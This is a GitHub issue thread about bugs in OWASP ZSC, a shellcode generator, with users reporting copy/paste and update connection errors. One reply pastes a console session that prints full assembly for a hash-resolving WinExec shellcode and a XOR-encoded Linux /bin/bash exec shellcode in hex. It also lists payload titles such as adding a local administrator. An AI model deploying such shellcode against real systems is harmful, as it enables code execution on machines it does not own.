Open iNoSec opened 6 years ago
My bad thats simple the copy/paste thas make bug, if type the command not like a big fat ass thats work, can close this issue
just update dont work
works fine for me!
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode>
download generate search shell_storm_list
zsc/shellcode> search
keyword_to_search>
download generate search shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148 platform: Windows title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581 platform: Windows title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck shellcode_id: 766 platform: Windows title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck shellcode_id: 662 platform: Windows title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss shellcode_id: 391 platform: Windows title: WinExec() Command Parameter - 104 bytes
zsc> shellcode
zsc/shellcode> download
shellcode_id> 391
;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
assume fs:nothing
code_start:
jmp load_data
setup_parameters:
pop ebp
xor ecx,ecx
push ecx ; ExitThread() exitcode
push ecx ; SW_HIDE
mov cl,(cmd_end-api_hashes) ; limit of 255 bytes per command
inc byte ptr[ebp+ecx]
lea eax,[ebp+(cmd_string-api_hashes)]
push eax ; WinExec command string
get_k32_base:
mov cl,30h
mov eax,fs:[ecx]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h]
get_api_loop:
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h]
lea esi,[ebx+eax+1ch]
mov cl,3
load_rva:
lodsd
add eax,ebx
push eax
loop load_rva
pop ebp
pop edi
load_api:
mov esi,[edi+4*ecx]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api
inc ecx
mov eax,[esp+4]
cmp dx,word ptr[eax]
jne load_api
pop eax
movzx edx,word ptr[ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop esi
call ebx
lodsw
jmp get_k32_base
load_data:
call setup_parameters
api_hashes:
hashapi <WinExec>
hashapi <ExitThread>
code_end:
cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1
end code_start
Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod download exec script_executor write
dir_create download_execute file_create system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash
[+] file_to_execute set to "/bin/bash"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80
Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
if you still have errors, please provide your os, os version, python version.
Like i said, i copied/paste command but when i write them, all is working just the update command which fail with a connection errror. I can dl shellcode from shellstorm so i have no problem with my connection. Im not on my pc now but i will see the update URL in the code tonight. Im on ParrotOS and i use python 2.7 for owasp zsc (i confirm tonight) Thanks
hi, whatever i chose i have an error, i cant see shellstorm shellcode because connection error or anything else. i saw there is ton ofbugs after an update, does it affect all the framework?